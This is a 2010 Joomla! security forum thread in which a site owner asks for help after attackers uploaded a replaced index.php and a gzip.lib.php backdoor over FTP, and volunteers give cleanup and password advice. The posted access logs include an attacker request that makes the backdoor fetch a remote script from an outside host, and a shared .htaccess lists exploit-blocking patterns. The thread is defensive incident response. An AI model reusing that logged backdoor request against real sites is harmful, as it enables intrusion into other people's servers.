Attacked by replacing index.php and inserting gzip.lib.php

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

Moderator: General Support Moderators

Forum rules
Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.
User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Attacked by replacing index.php and inserting gzip.lib.php

Post by RysiuM » Sun Nov 07, 2010 4:28 am

This is exactly the same attack described in the post http://forum.joomla.org/viewtopic.php?f=432&t=418523. What is significant both sites I manage have been attacked from the same IP at the same time. The first site is life for already 2 years but the first attack was in July this year:

The FTP log looks like that:

Code: Select all

Thu Jul 22 10:25:53 2010 0 213.5.68.141 10786 ....../templates/template/index.php a _ o r xxx ftp 1 * c
Thu Jul 22 10:25:53 2010 0 213.5.68.141 10832 ....../templates/template/index.php a _ i r xxx ftp 1 * c
Thu Jul 22 10:25:55 2010 0 213.5.68.141 10786 ....../templates/template/index.php a _ i r xxx ftp 1 * c
Thu Jul 22 10:25:56 2010 0 213.5.68.141 29463 ....../administrator/includes/pcl/gzip.lib.php a _ i r xxx ftp 1 * c
In August I put the second site live and now in October The same attack went to the both websites (from the same IP). The second attack happened the same day, few hours apart.

Both sites are running Joomla 1.5.9, almost vanilla on the same hosting. Do you have any idea how that ftp happened? Hard to believe that the guy broke two passwords for two sides. I wonder if it is something to be addressed by me or by my host.

Both sites have been fixed (I am doing backups) and passwords were changed, IP blocked but I wonder what was the original backdoor for that attack.

 
User avatar
tastrax
Joomla! Ace
Joomla! Ace
Posts: 1874
Joined: Tue Sep 20, 2005 12:36 pm
Location: Tasmania

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by tastrax » Sun Nov 07, 2010 5:03 am

no idea on the backdoor but take a few minutes to update to 1.5.22.
http://declarationoffreedom.com - Declaration of freedom - you are free..
http://www.kiva.org - Kiva - loans that change lives

Updated to 2.5.3

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Sun Nov 07, 2010 5:10 am

As Tastrax mentions your Joomla sites are completely outdated and you need an urgent upgrade..(Releases on 1.5 are at present done only for security reasons and or sever bugs. All new feutures are added to 1.6 or later). You run very vulnerable sites and you need not only to check your Joomla and upgrade but also the vulnerable extension list (see beginning of the security forum) Most often these backdoors and ftp hacks are caused by something from your own PC..... read and act http://forum.joomla.org/viewtopic.php?f=432&t=411735

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

Lightme
Joomla! Intern
Joomla! Intern
Posts: 61
Joined: Fri Jun 15, 2007 10:54 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Lightme » Sun Nov 07, 2010 5:36 am

I also recommend to do a search on this website/forum to protect and configurate good your. htacces file

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 6:02 am

Thank you for the prompt response.
Upgrade will take much more than few minutes (at least on one site) as I have "mod_M17n" fixed a lot (so it actually works) and that mode has few changes to base php code. There are other changes I have made (I'm glad I documented them well) that will make update to be PITA. What probably will happen I will have to do manual update by applying changes either way.

There are no "add-ons" on except
modules:
- mod_M17n (only second site)
- mod_articlelist (only second site)

plugins:
- Simple Image Gallery Plugin - (Version 1.2.1 (released on January 6th, 2007))
- AllVideos (by JoomlaWorks) - (Last update: August 10th, 2008 - version 2.5.3)
- System - Multilingual (M17n) - (fixed by me to work properly with home page) - (only second site)
- Button - Xmap Link - (only second site)
- System - Tag Meta (Version 1.2) - (only second site)

So as you see, they are not fancy at all and only add-ons installed on both sites are simple image gallery and AllVideos.

Of course I went through all security recommendations (except the upgrade which I see the only thing I can add to my "to-do list")

What I suspect is that the "ftp" was from some "tool" not a human action (identical entries in the ftp log) and the changes on my site were identical and limited to these two files (if someone knows my password, I would imagine my sites will be quite different by now).

If this can help to find out what is wrong, here is the full extract from raw log accessing my second site from that IP address:
FTP log:
==========
Mon Oct 25 04:55:05 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ o r xxx ftp 1 * c
Mon Oct 25 04:55:06 2010 0 213.5.68.141 11076 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:07 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:08 2010 0 213.5.68.141 29463 ..../administrator/includes/pcl/gzip.lib.php a _ i r xxx ftp 1 * c


Raw access log:
================
213.5.68.141 - - [25/Oct/2010:04:46:41 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:00 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:04 -0500] "HEAD ///templates/template2/index.php HTTP/1.1" 404 - "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:06 -0500] "GET / HTTP/1.0" 200 15290 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:09 -0500] "HEAD ///administrator/includes/pcl//gzip.lib.php HTTP/1.1" 404 - "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:09 -0500] "HEAD ///administrator/includes/pcl//gzip.lib.php HTTP/1.1" 200 - "-" "-"

...

213.5.68.141 - - [26/Oct/2010:05:35:32 -0500] "GET ///administrator/includes/pcl//gzip.lib.php?check_script HTTP/1.0" 200 34 "-" "-"
213.5.68.141 - - [26/Oct/2010:05:35:33 -0500] "GET ///administrator/includes/pcl//gzip.lib.php?include_update=http://safebotslogs.net/StatC/Stat.php HTTP/1.0" 200 42 "-" "-"
213.5.68.141 - - [26/Oct/2010:05:35:34 -0500] "HEAD / HTTP/1.1" 200 - "-" "-"
213.5.68.141 - - [26/Oct/2010:05:35:36 -0500] "GET /?look HTTP/1.0" 200 15278 "-" "-"

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by PhilD » Sun Nov 07, 2010 12:59 pm

FIRST YOU CAN NOT UPDATE/UPGRADE!! Simply doing an upgrade or package update to the latest version will not get rid of the issue on either site as files such as gzip.lib.php will not be replaced by the update. The files that have been placed on your site will remain and continue to be active.

You MUST REMOVE/Delete all files from the site and then upload a full install of the latest Joomla. Only by deleting all files from the sites can you be sure the hack files are gone.

Here are guides to help:

http://docs.joomla.org/Security_Checklist_7

http://docs.joomla.org/Vulnerable_Extensions_List

Forum post assistant:

http://forum.joomla.org/download/file.php?id=66336
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 6:13 pm

This is the output:
JTS-post Diagnostic Information wrote:Joomla! Version: Joomla! 1.5.9 Production/Stable [ Vatani ] 9-January-2009 23:00 GMT
configuration.php: Writable (Mode: 644 ) | Architecture/Platform: Linux 2.6.18-164.el5PAE ( i686) | Web Server: Apache | PHP Version: 5.2.9
PHP Requirements: register_globals: Disabled | magic_quotes_gpc: Enabled | safe_mode: Disabled | MySQL Support: Yes | XML Support: Yes | zlib Support: Yes
mbstring Support (1.5 or above): Yes | iconv Support (1.5 or above): Yes | save.session_path: Writable | Max.Execution Time: 60 seconds | File Uploads: Enabled
MySQL Version: 5.0.51a-community-log ( Localhost via UNIX socket )
JTS-post Extended Information wrote:SEF: Enabled (with ReWrite) | Legacy Mode: Disabled | FTP Layer: Disabled | htaccess: Implemented
PHP/suExec: User and Web Server accounts are the same. (PHP/suExec probably installed)
PHP Environment: API: cgi-fcgi | MySQLi: Yes | Max. Memory: 256M | Max. Upload Size: 12M | Max. Post Size: 8M | Max. Input Time: 60 | Zend Version: 2.2.0
Disabled Functions:
MySQL Client: 5.0.51a ( latin1 )
List of extensions has been verified against the Vulnerable_Extensions_List (report show all base joomla and add-ons I have listed before)
Sites have been recovered and checked against any changes - the only thing that has been done during attack was two files listed earlier (I have multiple full backups from the day one). All raw log show that the only activities from that attacking IP was only these entries listed above (I have full raw logs since the day one). It looks like the there were three http requests just before the ftp invasion:

Code: Select all

213.5.68.141 - - [25/Oct/2010:04:46:41 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:00 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:04 -0500] "HEAD ///templates/template2/index.php HTTP/1.1" 404 - "-" "-"
I don't know if any information was returned that shouldn't. I don't know where to look for clues. Here is the .htaccess in case it is one to blame:
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
Options +FollowSymLinks
RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common ex

RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

<Limit GET POST>
#The next line modified by DenyIP
order allow,deny
#The next line modified by DenyIP
#deny from all
allow from all
</Limit>

<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

AuthUserFile "....../.htpasswds/public_html/passwd"

<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "configuration.php">
Order allow,deny
Deny from all
</FilesMatch>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 150.70.84.
AuthName "........."
deny from 213.5.68.141

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14970
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by mandville » Sun Nov 07, 2010 6:18 pm

some notes.
apart from the obvious out of date joomla you have.
the htaccess file will also be out of date, and you have front page extensions installed.
all bad practices/
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 9:03 pm

mandville wrote:some notes.
apart from the obvious out of date joomla you have.
the htaccess file will also be out of date, and you have front page extensions installed.
all bad practices/
1. I will upgrade Joomla - need some time but I will. This is out of question.
2. I suspect htaccess is not the best one - yesterday I tried to put most of the stuff already suggested, but I got errors, so I need more work on that to see what entry is screwing up. Of cousre any suggestions for critical entries are welcome.
3. I have no clue about front page extensions? What is that?

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Sun Nov 07, 2010 9:17 pm

@RysiuM
Have you deleted all files as previously advised ?
Have you installed the newest version of Joomla ?
Have you reinstalled the newest versions of the Extensions as previously advised ?
Have you checked the links as previously advised ?

Also have you checked all PC's/Mac's, that have access to your server, with every anti virus and anti malware program that you can ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 10:54 pm

Webdongle wrote:@RysiuM
Have you deleted all files as previously advised ?
yes
Webdongle wrote: Have you installed the newest version of Joomla ?
Not yet - it will take time as there is no "upgrade path 1.5.9 -> 1.5.22", but installation from scratch and applying all customizations I have done to my current version . I understand that new version is much safer but does it plug the hole that "my attacker" have used?
Webdongle wrote: Have you reinstalled the newest versions of the Extensions as previously advised ?
Only two I use:
Simple Image Gallery Plugin - has no updates
AllVideos - the new version is listed having security problems - no word about the old I'm using
Webdongle wrote: Have you checked the links as previously advised ?
Yes, I did
Webdongle wrote: Also have you checked all PC's/Mac's, that have access to your server, with every anti virus and anti malware program that you can ?
Yes I have - came clean. I have Trend Micro installed for years.

At this point both websits are clean and running. Attackers IP is blocked. Upgrade to 1.5.22 will take a while (want happen overnight). I'm monitoring the site (for that attack I know what to look for). I have all backups (this is why I could recover so fast).

What is bugging me, nobody say anything (i have searched Joomla forum and the web for possible answers) what is that attack (it happen to more people, not just me) and what is the hole that attack is using.

I wonder if anyone has a suggestion what critical is missing (or wrong) in my .htaccess.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Sun Nov 07, 2010 11:34 pm

If you deleted the files but did not replace with files from the latest Joomla full installation zip then what files did you put back on your site ? Back up files that could be compromised ?

Also using just one anti virus is not enough. Recently I had to use 8 anti virus/ anti malware programs to get rid of a nasty virus on a friends PC. Her 13 year old grandson had been visiting a few suspect sites, he must have clicked 'allow' a lot of times. Point being checking with one is never enough.
but installation from scratch and applying all customizations I have done to my current version
Was it core files that you modified ?


What are your site url's ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Mon Nov 08, 2010 12:02 am

Webdongle wrote:If you deleted the files but did not replace with files from the latest Joomla full installation zip then what files did you put back on your site ? Back up files that could be compromised ?
I had backups from day one. I have checked and compared (binary) all files from the website with the clean local backups. Only two files were changed/added in this attack. All other files are the same. If they are compromised, they would have been compromised in the original Joomla 1.5.9 installation package.
Webdongle wrote:Was it core files that you modified ?
What are your site url's ?
There are three types of modifications I did:

One site is easy - just publishing authority (I described almost 2 years ago).
Second site is dual language, and that mod replaced some core files. What I found, the mod has bugs and issues, so I fixed them in some places (menu items handling, home page handling). This is the most work to get to the new installation but doable.
There are also plugins I have changed. It is easy to put to new version as plugins are independent and can be easy upgraded.

I am not sure if giving site names will brake rules of that forum.

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Mon Nov 08, 2010 12:29 am

PM me the url's if you like
What I found, the mod has bugs and issues, so I fixed them in some places (menu items handling, home page handling)
mmmmmmmmm ... could that be where they got in ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Mon Nov 08, 2010 5:10 am

Webdongle wrote:mmmmmmmmm ... could that be where they got in ?
It is not on the first site, but still got hacked. PM sent

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Mon Nov 08, 2010 2:20 pm

Sent a full report of what I checked but in summary
Two Domain names with one IP address
One domain name showed two files with Iframes.

Also a scan of the IP led to a link showing several mail servers etc connected with the IP

Conclusion
Either the IP has been Hi Jacked or a PC is being controlled remotely with a Trojan (that is the easiest thing in the world to do if the victim thinks their computer is clean).
Bundling

Bundling is one of the most common ways parasites are spread. It works like this: you install a piece of software you think looks good, and it invites some of its friends onto your computer behind your back.

When you run any piece of software, remember that it has the capability to do anything you can do—up to and including deleting all your files. Only install software from authors you trust, and look out for the warning signs of untrustworthy authors.
http://www.doxdesk.com/parasite/prevention.html

And for Mac (anyone with upload privileges in your Joomla have a Mac ? )
Technically, the Trojan is known as AppleScript-THT, and is classified as a Trojan horse exploit. The virus affects the Apple Remote Desktop Agent software in OS X to compromise the operating system, and gives remote control of the user’s computer to hackers. The virus is transmitted online, and targets only Mac OS X operating systems, while ignoring Windows users completely (a nice change of pace).
http://www.romow.com/computer-blog/rare ... nfect-pcs/

Best guess
A PC/Mac is still infected
and or
One or more of your backup files is corrupt.
creating an infinite loop infecting and reinfecting.

Possibly, if remote access of a PC/Mac has been initiated then, your IP could have been hi-jacked. And the hacker has altered some of the DNS records on your Server.

Recommendations
Check all PC's/Mac's that connect to your server, with everything available, until you find the culprit. IT IS THERE !!!

This is more than some script kiddy uploading script, it has all the 'Hallmarks' of remote control with a Trojan.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by PhilD » Tue Nov 09, 2010 1:29 am

"3. I have no clue about front page extensions? What is that?"
Frontpage extensions are a set of server-side scripts and programs which enable users of Microsoft FrontPage to use its special components called Web Bots on a Unix type server. These scripts and programs are not the most secure and should be removed from the domain if your not using Frontpage or have a website that was developed with Microsoft Frontpage.
Usually, there will be an option in the domains control panel to remove these Frontpage extensions. If not, or you can not find where to remove the extensions, ask your hosting service tech support to remove Frontpage extensions from your domain(s).
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

User avatar
PhilD
Joomla! Hero
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by PhilD » Tue Nov 09, 2010 1:33 am

If the same hosting account hosts all your domains, it is possible to get into one and then get into the others from that one. After all they are just subdirectories of the main account.

your main hosting account directory
_______|______ ***** Manual signatures are NOT allowed *****
| | |
domain1 domain2 domain3
Last edited by PhilD on Tue Nov 09, 2010 1:37 am, edited 1 time in total.
Reason: stupid me.. hit wrong keys
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Tue Nov 09, 2010 2:17 am

Here is the update:

I access ftp and cpanel to both sites from only one PC with Trend Micro. Run the full check, came clean.
Both websites are on the shared hosting at mochahost - two independent accounts but looks like mochahost put them on the same shared IP.
FrontPage Extension is not installed (available but I did not install it).
Backup of website is clean (I am 100% sure).

What I can suspect are only 3 options:
1. My PC got trojan not found by TrendMicro and the passwords got stolen
2. Someone was able to brake into mochahost server
3. Someone is able to break into my sites via FTP or HTTP (maybe there is a hole I am not aware of)

What is weird, there was guy (post http://forum.joomla.org/viewtopic.php?f=432&t=418523) who reported exactly the same kind of attack before so he must meat the same criteria I did.

richardsec
Joomla! Apprentice
Joomla! Apprentice
Posts: 13
Joined: Sat Oct 09, 2010 10:31 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by richardsec » Tue Nov 09, 2010 6:59 am

RysiuM wrote:Thank you for the prompt response.
What I suspect is that the "ftp" was from some "tool" not a human action (identical entries in the ftp log) and the changes on my site were identical and limited to these two files (if someone knows my password, I would imagine my sites will be quite different by now).

If this can help to find out what is wrong, here is the full extract from raw log accessing my second site from that IP address:
FTP log:
==========
Mon Oct 25 04:55:05 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ o r xxx ftp 1 * c
Mon Oct 25 04:55:06 2010 0 213.5.68.141 11076 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:07 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:08 2010 0 213.5.68.141 29463 ..../administrator/includes/pcl/gzip.lib.php a _ i r xxx ftp 1 * c

...
This indicates that someone has either compromised your PC, stealing FTP passwords, or has guessed your FTP password (known as bruteforcing, there is very good technology available for password cracking so even 8 character passwords are not enough).

Once a hacker has got your FTP password, it often goes into a long list that's used by a hacker tool that will try many sites at once - that's why both domains are attacked at almost the same time.

Like others in this thread, I strongly suspect an infected PC/Mac. It's essential to scan with several antivirus tools. For PC, I would use free trials or web scans using ALL of the following.

- Kaspersky - use their trial software (antivirus only) - http://www.kaspersky.co.uk/ - or their online scanner, or their free virus removal tool (latter is recommended)
- ESET NOD32 - free trial of NOD32 antivirus - has a free web based scan that's OK for light infections - http://www.eset.co.uk/
- Prevx - free trial - guarantees removal if you pay for their tool - http://www.prevx.com/
- Malwarebytes (free) - very good on removal of viruses the others can't remove - http://www.malwarebytes.org/
- SuperAntispyware (free) - good for spyware removal - http://www.superantispyware.com/
- Sophos Anti-Rootkit (free) - the most stubborn and well-hidden viruses are called 'rootkits' - http://www.sophos.com/products/free-too ... otkit.html
- optional: try ComboFix, GMER, HiJackThis and others as recommended by antivirus forums - more expertise required though

Any single antivirus will only find about 60% of all viruses, and in some cases it will find 'false positives' - legitimate files that it thinks are viruses.

I don't recommend Trend Micro - from reading av-test.de, I would go with one of ESET, Kaspersky Norton 2010 (much better than old versions), and also run Prevx (free or paid edition) on top - Prevx is very light and runs well with other antiviruses.

Also, on your PC, install Secunia PSI so that you get alerts of out of date applications - the classic way a PC is exploited is by (a) hacker compromising website and uploading malicious JavaScript, then (b) site visitor loads JavaScript which attempts to exploit a number of holes in out of date apps on their PC. (This is also a good reason to secure your website, so you don't infect your visitors.)

For Mac, I would scan with Intego, Sophos (free) and Panda, and make sure you keep up to date with all software updates including third party apps such as Flash and Adobe apps.

I assume you've changed your FTP password, but in addition:
- stop using FTP, start using SFTP - some client PC malware will spy on the TCP traffic on your PC so that it can get the passwords. SFTP is immune to this, and most good webhosts support this.
- set a 12 character random password for FTP and a different one for SFTP

To help in generating and remembering these strong passwords, try using LastPass, which makes it easy to manage all your passwords in one place, or KeePass.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Tue Nov 09, 2010 8:31 am

Recommendations
Check all PC's/Mac's that connect to your server, with everything available, until you find the culprit. IT IS THERE !!!

This is more than some script kiddy uploading script, it has all the 'Hallmarks' of remote control with a Trojan.
Cannot agree more. FTP has been compromised and the moment your ftp is loaded the bad script is automatically activated. Couple of hings here...Use indeed Prevx/Malwarebytes or Panda. All 3 will definitely discover Gumblar or its variables for sure (we know that by experience) Run multiple scanners simultaneously..We use PrevX 3.x real-time protection and Panda Security Suite 2010/2011 one each and every PC. You will be amazed what is being thrown at your PC through your browsers for instance.

Passwords: Use very strong passwords. Generate with at least 14 or better 18 digits (see and digest http://strongpasswordgenerator.com/) and do NOT store them in your ftp-client (!)

Use an ftp-client that does not store user data (user/pass) in plain text. Make sure you use a professional client that encrypts the passwords or better use KeePass (http://keepass.info/)

Use if enabled by your host SFTP for FTP (Uses SSH: http://en.wikipedia.org/wiki/Secure_Shell) but first "clean that PC of yours" As mentioned the stuff is present and if you cannot find it.... well mate I have gone through it myself 1 1/2 years ago and I actually took my backups, whipped out/formatted my entire PC including my bootsector to make sure that "Gumblar" was gone. I was affected through a clients site and running other security software which actually did not protect me that time (McAfee in those days). These days when we visit a client site we actually use special designated and protected PC's not inter-connected in our network. Are we over protective? Cannot be too careful at all!

Hope this helps
Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Tue Nov 09, 2010 2:07 pm

RysiuM wrote:...

I access ftp and cpanel to both sites from only one PC with Trend Micro. Run the full check, came clean.
....
If you look at the two posts above this one then you will see that there are now 3 of us that say checking with one anti virus is not enough.

I say again
Webdongle wrote:......
Check all PC's/Mac's that connect to your server, with everything available, until you find the culprit. IT IS THERE !!!
.......
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
RysiuM
Joomla! Apprentice
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Wed Nov 10, 2010 1:13 am

Webdongle wrote:If you look at the two posts above this one then you will see that there are now 3 of us that say checking with one anti virus is not enough.
Just finished checking with the fourth tool - still clean. I don't want to get into paranoia :eek: Both sites are still clean (watching them every day).

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Wed Nov 10, 2010 1:24 am

Scanning the IP finds
Report 2010-11-08 13:25:24 (GMT 1)
IP Address 74.55.210.66
IP Hostname gt2.mochahost.com
IP Country US
AS Number 21844
AS Name THEPLANET-AS - ThePlanet.com Internet Service...
Detections 2 / 27 (7 %)
Status SUSPICIOUS
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Wed Nov 10, 2010 3:34 am

Webdongle wrote:Scanning the IP finds
means what?


Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Wed Nov 10, 2010 5:16 am

1082 domains (!) hosted on the same web server as IP 74.55.210.66... What you mean overselling. Now you can see why Mochahost is cheap...what is with security one than should ask himself

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

User avatar
Webdongle
Joomla! Master
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Wed Nov 10, 2010 1:35 pm

leolam wrote:1082 domains (!) hosted on the same web server as IP 74.55.210.66... ..
Nice spot, I missed that, only noticed his two on that.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

User avatar
mandville
Joomla! Master
Joomla! Master
Posts: 14970
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by mandville » Wed Nov 10, 2010 2:46 pm

Checking some of the domains listed show rampant infections . Wonder if they use jail shell ?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

User avatar
leolam
Joomla! Master
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Wed Nov 10, 2010 3:15 pm

